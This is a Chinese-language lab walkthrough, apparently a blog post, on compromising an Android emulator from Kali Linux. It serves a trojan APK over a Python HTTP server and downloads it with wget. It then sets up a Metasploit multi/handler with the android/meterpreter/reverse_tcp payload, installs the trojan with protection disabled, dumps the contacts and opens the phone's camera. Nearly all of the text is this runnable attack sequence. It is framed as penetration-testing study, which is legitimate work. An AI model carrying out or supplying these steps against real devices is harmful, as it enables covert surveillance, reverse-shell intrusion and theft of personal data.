DiX研究院
随着互联网技术的不断发展,诸如信息泄露、数据篡改等这类网络犯罪和攻击日益增多,全球网络安全事件频发,威胁程度不断上升,黑客和防御者之间的攻防对抗成为网络空间战场的主要形式。网络管理者需要进一步的保护和限制对内部网络数据的操作,以防止如陷门、病毒、非法浏览、拒绝服务、网络资源非法占有等无法控制的风险,并加以防范网络黑客的进攻。
kali设置桥接模式
打开kali系统虚拟机,在【网络适配器】上设置成【桥接模式】,点击【确定】。
测试虚拟机系统
在kali系统的命令窗口,使用【IP address】与【ping】命令,得到kali系统的IP地址,以及与android虚拟机的通信情况。
进入android系统的【终端模拟器】,使用【IP address】与【ping】命令,得到android系统的IP地址,以及与kali系统虚拟机的通信情况。
kali系统入侵准备
在kali命令窗口输入【python3 -m http.server 80】生成一个植入木马的网站。
在android系统上,找到谷歌浏览器,打开之后,在搜索栏输入【kali系统IP地址】,发现需要下载的【test.apk】,前往终端适配器进行下载。
下载木马软件
在终端模拟器输入【ls】命令,可以查看到当前文件内有【sdcard】文件。
输入【cd sdcard】,可以进入sdcard文件内部,再次输入【wget】命令,【wget http://10.9.44.187/test.apk】,执行下载命令。进入文件可看到test.apk文件。
设置监听
msfconsole
use exploit/multi/handler 【后门模块】
set payload android/meterpreter/reverse_tcp 【攻击载荷】
set LHOST 10.9.44.187【kali系统的IP地址】
set LPORT 4444【端口】
show options
run【运行】
启动木马程序
回到android系统,双击木马系统,点击【继续】—【安装】—【取消】保护,完成安装。
运行木马,同时新建一个电话联系人,名为【xx】,联系方式【110】
回到kali系统,此时已经完成对android系统的监听,并收到android系统回弹的连接,输入【dump_contacts】命令,获取联系人列表。
返回kali系统的文件管理器主界面,进入【home】目录,寻找到【contacts_dump.txt】文件,双击打开,查看内容是否与android系统输入的联系人信息一致。
内容与android输入的内容一致。
通过webcam_list命令,查看可打开的摄像头,可以看到1:后摄像头和2:前摄像头。
运行webcam_stream -i 1,打开后摄像头(模拟器环境无真实摄像头,固出现error),入侵摄像头完成。
随着国家将网络安全的发展作为战略目标,也随着以后工作经验的积累,以及接触的渗透测试越来越多,自己的渗透测试技术也会越来越丰富,对于渗透测试的研究也势必会更加深入,最终也希望自己能为国家的网络安全事业贡献出一份自己的力量。
原创文章,作者:guozi,如若转载,请注明出处:https://www.sudun.com/ask/90348.html